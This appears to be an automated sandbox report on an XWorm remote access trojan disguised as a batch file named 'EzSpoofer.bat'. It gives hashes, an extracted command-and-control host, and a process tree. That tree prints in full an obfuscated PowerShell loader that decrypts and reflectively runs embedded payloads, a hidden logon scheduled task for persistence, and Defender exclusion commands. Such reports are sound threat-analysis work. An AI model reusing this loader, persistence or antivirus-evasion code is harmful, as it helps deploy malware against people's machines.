xworm | 2bc671246bf742ed639bb5fafa2fcfae1f821500d21971c7a368eba3478b62a0

Resubmissions

24-01-2025 14:57

250124-sb3x4atncs 10

24-01-2025 14:50

250124-r7zd4svpfj 10

Analysis

max time kernel
295s
max time network
303s
platform
windows11-21h2_x64
resource
win11-20241007-en
resource tags

arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
submitted
24-01-2025 14:50

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

EzSpoofer.bat
Size

262KB
MD5

1298934b3f4c37d349794f0686c6e7a8
SHA1

9a6848b79ba8aba796514526898b4c9217301bc0
SHA256

2bc671246bf742ed639bb5fafa2fcfae1f821500d21971c7a368eba3478b62a0
SHA512

ee7afbdd2cc0297cd0da983618fa45e7c0304c142723f394a8a3d484d6f87e36a902f6dc4788007cd8df5252a455d697eeb21eb1673f41f9464a3d1872179374
SSDEEP

6144:lyFq/jSEnae2y5lSdU0NeUmerUzCO6jZFwkjAZ9:lyFqbSOaeUxeCOibw+AZ9

Score

10^/10

xworm execution rat trojan

Malware Config

Extracted

Family

xworm

IDKTOBEHONESTNIGAS-56344.portmap.io:56344

Mutex

RRwG35fodUbwRp96

aes.plain

Signatures

Detect Xworm Payload 1 IoCs

resource	yara_rule
behavioral2/memory/2408-48-0x0000023DE81A0000-0x0000023DE81B0000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Blocklisted process makes network request 64 IoCs

flow	pid	Process
2	2408	powershell.exe
4	2408	powershell.exe
5	2408	powershell.exe
6	2408	powershell.exe
7	2408	powershell.exe
8	2408	powershell.exe
9	2408	powershell.exe
10	2408	powershell.exe
11	2408	powershell.exe
12	2408	powershell.exe
13	2408	powershell.exe
14	2408	powershell.exe
15	2408	powershell.exe
16	2408	powershell.exe
17	2408	powershell.exe
18	2408	powershell.exe
19	2408	powershell.exe
20	2408	powershell.exe
21	2408	powershell.exe
22	2408	powershell.exe
23	2408	powershell.exe
24	2408	powershell.exe
25	2408	powershell.exe
26	2408	powershell.exe
27	2408	powershell.exe
28	2408	powershell.exe
29	2408	powershell.exe
30	2408	powershell.exe
31	2408	powershell.exe
32	2408	powershell.exe
33	2408	powershell.exe
34	2408	powershell.exe
35	2408	powershell.exe
36	2408	powershell.exe
37	2408	powershell.exe
38	2408	powershell.exe
39	2408	powershell.exe
40	2408	powershell.exe
41	2408	powershell.exe
42	2408	powershell.exe
43	2408	powershell.exe
44	2408	powershell.exe
45	2408	powershell.exe
46	2408	powershell.exe
47	2408	powershell.exe
48	2408	powershell.exe
49	2408	powershell.exe
50	2408	powershell.exe
51	2408	powershell.exe
52	2408	powershell.exe
53	2408	powershell.exe
54	2408	powershell.exe
55	2408	powershell.exe
56	2408	powershell.exe
57	2408	powershell.exe
58	2408	powershell.exe
59	2408	powershell.exe
60	2408	powershell.exe
61	2408	powershell.exe
62	2408	powershell.exe
63	2408	powershell.exe
64	2408	powershell.exe
65	2408	powershell.exe
66	2408	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
4016	powershell.exe
2876	powershell.exe
2408	powershell.exe
4216	powershell.exe
2860	powershell.exe

Loads dropped DLL 1 IoCs

pid	Process
2408	powershell.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
1	ip-api.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 10 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	powershell.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	powershell.exe

Enumerates system info in registry 2 TTPs 4 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	powershell.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\BIOSVersion	powershell.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\BIOSReleaseDate	powershell.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	powershell.exe

Modifies data under HKEY_USERS 15 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4290799360"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292114432"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "14"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1"	LogonUI.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = 99ebff004cc2ff000091f8000078d4000067c000003e9200001a6800f7630c00	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365268"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292114432"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365268"	LogonUI.exe

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings	firefox.exe

Suspicious behavior: EnumeratesProcesses 10 IoCs

pid	Process
4016	powershell.exe
4016	powershell.exe
2876	powershell.exe
2876	powershell.exe
2408	powershell.exe
2408	powershell.exe
2860	powershell.exe
2860	powershell.exe
4216	powershell.exe
4216	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4016	powershell.exe
Token: SeDebugPrivilege	2876	powershell.exe
Token: SeIncreaseQuotaPrivilege	2876	powershell.exe
Token: SeSecurityPrivilege	2876	powershell.exe
Token: SeTakeOwnershipPrivilege	2876	powershell.exe
Token: SeLoadDriverPrivilege	2876	powershell.exe
Token: SeSystemProfilePrivilege	2876	powershell.exe
Token: SeSystemtimePrivilege	2876	powershell.exe
Token: SeProfSingleProcessPrivilege	2876	powershell.exe
Token: SeIncBasePriorityPrivilege	2876	powershell.exe
Token: SeCreatePagefilePrivilege	2876	powershell.exe
Token: SeBackupPrivilege	2876	powershell.exe
Token: SeRestorePrivilege	2876	powershell.exe
Token: SeShutdownPrivilege	2876	powershell.exe
Token: SeDebugPrivilege	2876	powershell.exe
Token: SeSystemEnvironmentPrivilege	2876	powershell.exe
Token: SeRemoteShutdownPrivilege	2876	powershell.exe
Token: SeUndockPrivilege	2876	powershell.exe
Token: SeManageVolumePrivilege	2876	powershell.exe
Token: 33	2876	powershell.exe
Token: 34	2876	powershell.exe
Token: 35	2876	powershell.exe
Token: 36	2876	powershell.exe
Token: SeIncreaseQuotaPrivilege	2876	powershell.exe
Token: SeSecurityPrivilege	2876	powershell.exe
Token: SeTakeOwnershipPrivilege	2876	powershell.exe
Token: SeLoadDriverPrivilege	2876	powershell.exe
Token: SeSystemProfilePrivilege	2876	powershell.exe
Token: SeSystemtimePrivilege	2876	powershell.exe
Token: SeProfSingleProcessPrivilege	2876	powershell.exe
Token: SeIncBasePriorityPrivilege	2876	powershell.exe
Token: SeCreatePagefilePrivilege	2876	powershell.exe
Token: SeBackupPrivilege	2876	powershell.exe
Token: SeRestorePrivilege	2876	powershell.exe
Token: SeShutdownPrivilege	2876	powershell.exe
Token: SeDebugPrivilege	2876	powershell.exe
Token: SeSystemEnvironmentPrivilege	2876	powershell.exe
Token: SeRemoteShutdownPrivilege	2876	powershell.exe
Token: SeUndockPrivilege	2876	powershell.exe
Token: SeManageVolumePrivilege	2876	powershell.exe
Token: 33	2876	powershell.exe
Token: 34	2876	powershell.exe
Token: 35	2876	powershell.exe
Token: 36	2876	powershell.exe
Token: SeIncreaseQuotaPrivilege	2876	powershell.exe
Token: SeSecurityPrivilege	2876	powershell.exe
Token: SeTakeOwnershipPrivilege	2876	powershell.exe
Token: SeLoadDriverPrivilege	2876	powershell.exe
Token: SeSystemProfilePrivilege	2876	powershell.exe
Token: SeSystemtimePrivilege	2876	powershell.exe
Token: SeProfSingleProcessPrivilege	2876	powershell.exe
Token: SeIncBasePriorityPrivilege	2876	powershell.exe
Token: SeCreatePagefilePrivilege	2876	powershell.exe
Token: SeBackupPrivilege	2876	powershell.exe
Token: SeRestorePrivilege	2876	powershell.exe
Token: SeShutdownPrivilege	2876	powershell.exe
Token: SeDebugPrivilege	2876	powershell.exe
Token: SeSystemEnvironmentPrivilege	2876	powershell.exe
Token: SeRemoteShutdownPrivilege	2876	powershell.exe
Token: SeUndockPrivilege	2876	powershell.exe
Token: SeManageVolumePrivilege	2876	powershell.exe
Token: 33	2876	powershell.exe
Token: 34	2876	powershell.exe
Token: 35	2876	powershell.exe

Suspicious use of FindShellTrayWindow 21 IoCs

pid	Process
560	firefox.exe
560	firefox.exe
560	firefox.exe
560	firefox.exe
560	firefox.exe
560	firefox.exe
560	firefox.exe
560	firefox.exe
560	firefox.exe
560	firefox.exe
560	firefox.exe
560	firefox.exe
560	firefox.exe
560	firefox.exe
560	firefox.exe
560	firefox.exe
560	firefox.exe
560	firefox.exe
560	firefox.exe
560	firefox.exe
560	firefox.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
560	firefox.exe
1028	LogonUI.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1488 wrote to memory of 4016	1488	cmd.exe	78
PID 1488 wrote to memory of 4016	1488	cmd.exe	78
PID 4016 wrote to memory of 2876	4016	powershell.exe	79
PID 4016 wrote to memory of 2876	4016	powershell.exe	79
PID 4016 wrote to memory of 1112	4016	powershell.exe	82
PID 4016 wrote to memory of 1112	4016	powershell.exe	82
PID 1112 wrote to memory of 2292	1112	WScript.exe	83
PID 1112 wrote to memory of 2292	1112	WScript.exe	83
PID 2292 wrote to memory of 2408	2292	cmd.exe	85
PID 2292 wrote to memory of 2408	2292	cmd.exe	85
PID 2408 wrote to memory of 2860	2408	powershell.exe	86
PID 2408 wrote to memory of 2860	2408	powershell.exe	86
PID 2408 wrote to memory of 4216	2408	powershell.exe	88
PID 2408 wrote to memory of 4216	2408	powershell.exe	88
PID 3708 wrote to memory of 560	3708	firefox.exe	93
PID 3708 wrote to memory of 560	3708	firefox.exe	93
PID 3708 wrote to memory of 560	3708	firefox.exe	93
PID 3708 wrote to memory of 560	3708	firefox.exe	93
PID 3708 wrote to memory of 560	3708	firefox.exe	93
PID 3708 wrote to memory of 560	3708	firefox.exe	93
PID 3708 wrote to memory of 560	3708	firefox.exe	93
PID 3708 wrote to memory of 560	3708	firefox.exe	93
PID 3708 wrote to memory of 560	3708	firefox.exe	93
PID 3708 wrote to memory of 560	3708	firefox.exe	93
PID 3708 wrote to memory of 560	3708	firefox.exe	93
PID 560 wrote to memory of 1224	560	firefox.exe	94
PID 560 wrote to memory of 1224	560	firefox.exe	94
PID 560 wrote to memory of 1224	560	firefox.exe	94
PID 560 wrote to memory of 1224	560	firefox.exe	94
PID 560 wrote to memory of 1224	560	firefox.exe	94
PID 560 wrote to memory of 1224	560	firefox.exe	94
PID 560 wrote to memory of 1224	560	firefox.exe	94
PID 560 wrote to memory of 1224	560	firefox.exe	94
PID 560 wrote to memory of 1224	560	firefox.exe	94
PID 560 wrote to memory of 1224	560	firefox.exe	94
PID 560 wrote to memory of 1224	560	firefox.exe	94
PID 560 wrote to memory of 1224	560	firefox.exe	94
PID 560 wrote to memory of 1224	560	firefox.exe	94
PID 560 wrote to memory of 1224	560	firefox.exe	94
PID 560 wrote to memory of 1224	560	firefox.exe	94
PID 560 wrote to memory of 1224	560	firefox.exe	94
PID 560 wrote to memory of 1224	560	firefox.exe	94
PID 560 wrote to memory of 1224	560	firefox.exe	94
PID 560 wrote to memory of 1224	560	firefox.exe	94
PID 560 wrote to memory of 1224	560	firefox.exe	94
PID 560 wrote to memory of 1224	560	firefox.exe	94
PID 560 wrote to memory of 1224	560	firefox.exe	94
PID 560 wrote to memory of 1224	560	firefox.exe	94
PID 560 wrote to memory of 1224	560	firefox.exe	94
PID 560 wrote to memory of 1224	560	firefox.exe	94
PID 560 wrote to memory of 1224	560	firefox.exe	94
PID 560 wrote to memory of 1224	560	firefox.exe	94
PID 560 wrote to memory of 1224	560	firefox.exe	94
PID 560 wrote to memory of 1224	560	firefox.exe	94
PID 560 wrote to memory of 1224	560	firefox.exe	94
PID 560 wrote to memory of 1224	560	firefox.exe	94
PID 560 wrote to memory of 1224	560	firefox.exe	94
PID 560 wrote to memory of 1224	560	firefox.exe	94
PID 560 wrote to memory of 1224	560	firefox.exe	94
PID 560 wrote to memory of 1224	560	firefox.exe	94
PID 560 wrote to memory of 1224	560	firefox.exe	94
PID 560 wrote to memory of 1224	560	firefox.exe	94
PID 560 wrote to memory of 1224	560	firefox.exe	94
PID 560 wrote to memory of 1224	560	firefox.exe	94

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\EzSpoofer.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:1488
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('26XlvjUE5165AqEPeVe5DvD1fwVLlGClxE1+Dt9XjP0='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sfNDJdxmVNackDmrxAQ8EQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vXSyZ=New-Object System.IO.MemoryStream(,$param_var); $HPfSM=New-Object System.IO.MemoryStream; $VaLYr=New-Object System.IO.Compression.GZipStream($vXSyZ, [IO.Compression.CompressionMode]::Decompress); $VaLYr.CopyTo($HPfSM); $VaLYr.Dispose(); $vXSyZ.Dispose(); $HPfSM.Dispose(); $HPfSM.ToArray();}function execute_function($param_var,$param2_var){ $ZjffX=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $QLaJM=$ZjffX.EntryPoint; $QLaJM.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\EzSpoofer.bat';$jsdwy=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\EzSpoofer.bat').Split([Environment]::NewLine);foreach ($wiEcG in $jsdwy) { if ($wiEcG.StartsWith(':: ')) { $POWxE=$wiEcG.Substring(3); break; }}$payloads_var=[string[]]$POWxE.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4016
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_149_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_149.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2876
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_149.vbs"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1112
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_149.bat" "
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2292
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('26XlvjUE5165AqEPeVe5DvD1fwVLlGClxE1+Dt9XjP0='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sfNDJdxmVNackDmrxAQ8EQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vXSyZ=New-Object System.IO.MemoryStream(,$param_var); $HPfSM=New-Object System.IO.MemoryStream; $VaLYr=New-Object System.IO.Compression.GZipStream($vXSyZ, [IO.Compression.CompressionMode]::Decompress); $VaLYr.CopyTo($HPfSM); $VaLYr.Dispose(); $vXSyZ.Dispose(); $HPfSM.Dispose(); $HPfSM.ToArray();}function execute_function($param_var,$param2_var){ $ZjffX=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $QLaJM=$ZjffX.EntryPoint; $QLaJM.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_149.bat';$jsdwy=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_149.bat').Split([Environment]::NewLine);foreach ($wiEcG in $jsdwy) { if ($wiEcG.StartsWith(':: ')) { $POWxE=$wiEcG.Substring(3); break; }}$payloads_var=[string[]]$POWxE.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Loads dropped DLL
        Checks processor information in registry
        Enumerates system info in registry
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:2408
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2860
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4216
      - C:\Windows\SYSTEM32\shutdown.exe
        
        shutdown.exe /f /r /t 0
        6⤵
        
        PID:1140

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3708
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe"
  2⤵
  - Checks processor information in registry
  - Modifies registry class
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:560
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1996 -parentBuildID 20240401114208 -prefsHandle 1924 -prefMapHandle 1916 -prefsLen 23678 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {df8e71c2-0ba9-47c3-893a-1926f9f323c3} 560 "\\.\pipe\gecko-crash-server-pipe.560" gpu
    3⤵
    PID:1224
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2396 -parentBuildID 20240401114208 -prefsHandle 2392 -prefMapHandle 2388 -prefsLen 23714 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f8b41876-2356-4631-a7b5-335ea8e892e7} 560 "\\.\pipe\gecko-crash-server-pipe.560" socket
    3⤵
    PID:3744
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3152 -childID 1 -isForBrowser -prefsHandle 3052 -prefMapHandle 3188 -prefsLen 23855 -prefMapSize 244658 -jsInitHandle 1304 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d869d193-3e72-48c2-aac5-c13039cb96ca} 560 "\\.\pipe\gecko-crash-server-pipe.560" tab
    3⤵
    PID:2940
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3484 -childID 2 -isForBrowser -prefsHandle 3440 -prefMapHandle 3180 -prefsLen 29088 -prefMapSize 244658 -jsInitHandle 1304 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {42378772-0fbd-47ee-b0b3-37c46d5cf76e} 560 "\\.\pipe\gecko-crash-server-pipe.560" tab
    3⤵
    PID:3336
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4276 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4468 -prefMapHandle 4464 -prefsLen 29088 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e8b252b7-31b3-4e8a-9f35-bb5ee17184f7} 560 "\\.\pipe\gecko-crash-server-pipe.560" utility
    3⤵
    - Checks processor information in registry
    PID:1628
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5448 -childID 3 -isForBrowser -prefsHandle 5432 -prefMapHandle 5352 -prefsLen 27097 -prefMapSize 244658 -jsInitHandle 1304 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {bfd4f908-0ead-440e-8758-50f77e835c91} 560 "\\.\pipe\gecko-crash-server-pipe.560" tab
    3⤵
    PID:3912
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5620 -childID 4 -isForBrowser -prefsHandle 5696 -prefMapHandle 5692 -prefsLen 27097 -prefMapSize 244658 -jsInitHandle 1304 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0d39f786-c6a1-4315-a023-ba40c7cce05e} 560 "\\.\pipe\gecko-crash-server-pipe.560" tab
    3⤵
    PID:4348
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5848 -childID 5 -isForBrowser -prefsHandle 5592 -prefMapHandle 5596 -prefsLen 27097 -prefMapSize 244658 -jsInitHandle 1304 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {70d1f672-2635-4639-8189-79669207520b} 560 "\\.\pipe\gecko-crash-server-pipe.560" tab
    3⤵
    PID:4080

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x4 /state0:0xa3a11055 /state1:0x41c64e6d
1⤵
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
PID:1028

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
df472dcddb36aa24247f8c8d8a517bd7

SHA1
6f54967355e507294cbc86662a6fbeedac9d7030

SHA256
e4e0fbc974e6946d20ddfaf22c543fccc4662d28e30530ec710fec149958f9b6

SHA512
06383259258a8c32f676ddaf7ea1fec3de7318ff1338f022e03c6b33458f2ce708e073ceb1aa26e3cf37f82dac37c8163b8ebd2de56b8530dffe177845c7adca

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
eb15ee5741b379245ca8549cb0d4ecf8

SHA1
3555273945abda3402674aea7a4bff65eb71a783

SHA256
b605e00d6056ae84f253f22adf37d6561a86d230c26fba8bfb39943c66e27636

SHA512
1f71fe8b6027feb07050715107039da89bb3ed5d32da9dca0138c393e0d705ebf3533bcccec49e70a44e0ec0c07809aef6befa097ad4ced18ca17ae98e6df0e4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
2e8eb51096d6f6781456fef7df731d97

SHA1
ec2aaf851a618fb43c3d040a13a71997c25bda43

SHA256
96bfd9dd5883329927fe8c08b8956355a1a6ceb30ceeb5d4252b346df32bc864

SHA512
0a73dc9a49f92d9dd556c2ca2e36761890b3538f355ee1f013e7cf648d8c4d065f28046cd4a167db3dea304d1fbcbcea68d11ce6e12a3f20f8b6c018a60422d2

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\p38rro19.default-release\activity-stream.discovery_stream.json

Filesize
22KB

MD5
b41c2d8f3496d31ec65669e36cdbc68b

SHA1
5d771c1b5dc7e808b2c5d4a1d7e6051a2ba55d26

SHA256
cb612366f633d69673a9f45dbc4492c5b32ea7c2d1cab93fe9d6896aa4ee6a09

SHA512
